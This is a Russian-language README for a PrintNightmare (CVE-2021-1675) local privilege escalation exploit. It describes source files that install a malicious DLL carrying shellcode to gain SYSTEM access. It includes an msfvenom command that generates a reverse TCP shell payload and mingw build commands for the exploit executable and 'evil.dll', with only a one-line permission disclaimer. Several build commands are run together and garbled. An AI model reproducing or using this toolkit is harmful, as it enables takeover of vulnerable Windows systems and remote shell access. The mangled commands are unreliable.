
Эксплойт локального повышения привилегий для CVE-2021-1675 (PrintNightmare), который устанавливает вредоносную DLL для получения доступа SYSTEM на уязвимых системах Windows.
src/nightmare.cpp: исходный код для эксплуатации CVE-2021-1675 и получения системного доступа
путем установки вредоносной DLL
src/payload-dll.cpp: исходный код DLL с вредоносным шеллкодом в функции входа
!!Используйте только на серверах, на которые у вас есть разрешение на тестирование
CVE-2021-1675 — это уязвимость в службе диспетчера печати (Print Spooler) Microsoft Windows, которая позволяет злоумышленнику обойти проверку SeLoadDriverPrivilege. Это можно использовать для повышения привилегий на целевой машине путем установки вредоносной DLL, которая вызывает шеллкод или использует Windows API для установления обратного подключения. Затронуты версии Windows 10/8/Server 2008/Server 2012 до 8 июня 2021 года.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/